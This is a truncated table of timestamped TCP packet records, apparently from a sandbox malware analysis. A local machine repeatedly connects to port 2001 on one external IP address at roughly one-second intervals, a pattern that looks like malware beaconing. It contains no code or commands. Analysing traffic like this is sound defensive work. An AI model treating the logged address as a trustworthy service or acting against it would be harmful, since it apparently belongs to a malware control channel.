                                                                                              Oct 31, 2024 07:41:39.222918034 CET200149751181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.229500055 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.234428883 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.234508991 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.234870911 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.239650011 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.791227102 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:40.791296005 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.791347980 CET497522001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:40.796232939 CET200149752181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:41.811675072 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:41.816620111 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:41.816720963 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:41.817111015 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:41.821892977 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:42.375575066 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:42.375711918 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:42.375822067 CET497532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:42.380671978 CET200149753181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.385826111 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.390852928 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.390950918 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.391319036 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.396087885 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.950627089 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:43.950701952 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.950783968 CET497542001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:43.955574036 CET200149754181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:44.963911057 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:44.968933105 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:44.969012022 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:44.969399929 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:44.974277973 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:45.522367001 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:45.522449017 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:45.522530079 CET497552001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:45.527394056 CET200149755181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:46.526601076 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:46.531588078 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:46.531698942 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:46.532179117 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:46.536963940 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:47.077120066 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:47.077217102 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:47.077311039 CET497562001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:47.082068920 CET200149756181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.089334965 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.094672918 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.094806910 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.095206022 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.100560904 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.646112919 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:48.646222115 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.646307945 CET497572001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:48.651187897 CET200149757181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:49.651438951 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:49.656462908 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:49.656539917 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:49.656958103 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:49.661763906 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:50.208179951 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:50.208256006 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:50.208363056 CET497582001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:50.213071108 CET200149758181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.214850903 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.219916105 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.220024109 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.220516920 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.225285053 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.798034906 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:51.798150063 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.798249006 CET497592001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:51.803155899 CET200149759181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:52.807745934 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:52.812736034 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:52.812830925 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:52.815630913 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:52.820517063 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:53.365606070 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:53.365775108 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:53.365859032 CET497602001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:53.370646000 CET200149760181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:54.370198011 CET497612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:54.375122070 CET200149761181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:54.375240088 CET497612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:54.375581026 CET497612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:54.380341053 CET200149761181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:54.919889927 CET200149761181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:54.920087099 CET497612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:54.920087099 CET497612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:54.925046921 CET200149761181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:55.932540894 CET497622001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:55.937514067 CET200149762181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:55.937603951 CET497622001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:55.937978029 CET497622001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:55.942837954 CET200149762181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:56.651932001 CET200149762181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:56.652053118 CET497622001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:56.652127028 CET497622001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:56.656933069 CET200149762181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:57.667016983 CET497642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:57.671933889 CET200149764181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:57.672020912 CET497642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:57.672425985 CET497642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:57.677213907 CET200149764181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:58.231223106 CET200149764181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:58.231283903 CET497642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:58.231360912 CET497642001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:58.236171961 CET200149764181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:59.245210886 CET497662001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:59.250157118 CET200149766181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:59.250247955 CET497662001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:59.250597000 CET497662001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:59.255424023 CET200149766181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:59.801213980 CET200149766181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:41:59.801295996 CET497662001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:59.801395893 CET497662001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:41:59.806158066 CET200149766181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:00.807656050 CET497772001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:00.814770937 CET200149777181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:00.814851046 CET497772001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:00.815279007 CET497772001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:00.821058989 CET200149777181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:01.365036964 CET200149777181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:01.365104914 CET497772001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:01.365169048 CET497772001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:01.370218039 CET200149777181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:02.371098042 CET497832001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:02.375895023 CET200149783181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:02.375971079 CET497832001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:02.376348019 CET497832001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:02.381161928 CET200149783181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:02.920078039 CET200149783181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:02.920176983 CET497832001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:02.920285940 CET497832001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:02.925088882 CET200149783181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:03.932791948 CET497942001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:03.937727928 CET200149794181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:03.937844992 CET497942001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:03.938416958 CET497942001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:03.944494009 CET200149794181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:04.488739014 CET200149794181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:04.488840103 CET497942001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:04.488893986 CET497942001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:04.493803024 CET200149794181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:05.495049000 CET498052001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:05.500065088 CET200149805181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:05.500134945 CET498052001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:05.500474930 CET498052001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:05.505270958 CET200149805181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:06.058459044 CET200149805181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:06.058517933 CET498052001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:06.058568001 CET498052001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:06.063462973 CET200149805181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:07.073554039 CET498162001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:07.078713894 CET200149816181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:07.078818083 CET498162001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:07.079178095 CET498162001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:07.083982944 CET200149816181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:07.629740000 CET200149816181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:07.629817963 CET498162001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:07.632901907 CET498162001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:07.637749910 CET200149816181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:08.651729107 CET498242001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:08.656689882 CET200149824181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:08.656781912 CET498242001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:08.657244921 CET498242001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:08.662038088 CET200149824181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:09.217772961 CET200149824181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:09.217855930 CET498242001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:09.217916012 CET498242001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:09.222879887 CET200149824181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:10.233074903 CET498332001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:10.238163948 CET200149833181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:10.238262892 CET498332001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:10.238744020 CET498332001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:10.243912935 CET200149833181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:10.801986933 CET200149833181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:10.802062035 CET498332001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:10.802122116 CET498332001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:10.807002068 CET200149833181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:11.807681084 CET498442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:11.812767029 CET200149844181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:11.812850952 CET498442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:11.813179016 CET498442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:11.818120956 CET200149844181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:12.357122898 CET200149844181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:12.357183933 CET498442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:12.357249022 CET498442001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:12.362209082 CET200149844181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:13.370584011 CET498532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:13.377155066 CET200149853181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:13.377221107 CET498532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:13.377765894 CET498532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:13.382962942 CET200149853181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:13.954794884 CET200149853181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:13.954902887 CET498532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:13.954966068 CET498532001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:13.959804058 CET200149853181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:14.932799101 CET498612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:14.937860966 CET200149861181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:14.937952995 CET498612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:14.938355923 CET498612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:14.943128109 CET200149861181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:15.488902092 CET200149861181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:15.489003897 CET498612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:15.489068031 CET498612001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:15.493891001 CET200149861181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:16.433114052 CET498722001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:16.438141108 CET200149872181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:16.438230038 CET498722001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:16.438779116 CET498722001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:16.443624020 CET200149872181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:16.994286060 CET200149872181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:16.994406939 CET498722001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:16.994502068 CET498722001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:16.999506950 CET200149872181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:17.906821966 CET498812001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:17.911561012 CET200149881181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:17.911649942 CET498812001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:17.918639898 CET498812001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:17.923470020 CET200149881181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:18.460721016 CET200149881181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:18.460791111 CET498812001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:18.460872889 CET498812001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:18.465761900 CET200149881181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:19.339102983 CET498892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:19.343934059 CET200149889181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:19.344019890 CET498892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:19.344348907 CET498892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:19.349137068 CET200149889181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:19.905015945 CET200149889181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:19.905102015 CET498892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:19.905165911 CET498892001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:19.909960985 CET200149889181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:20.760952950 CET498992001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:20.765873909 CET200149899181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:20.765980959 CET498992001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:20.766371965 CET498992001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:20.771145105 CET200149899181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:21.309994936 CET200149899181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:21.310101032 CET498992001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:21.310157061 CET498992001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:21.315084934 CET200149899181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:22.239376068 CET499102001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:22.244115114 CET200149910181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:22.244182110 CET499102001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:22.244554996 CET499102001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:22.249378920 CET200149910181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:22.824367046 CET200149910181.236.112.169192.168.2.4
                                                                                              Oct 31, 2024 07:42:22.824440002 CET499102001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:22.824481964 CET499102001192.168.2.4181.236.112.169
                                                                                              Oct 31, 2024 07:42:22.829380989 CET200149910181.236.112.169192.168.2.4
                                                                                              Oct 31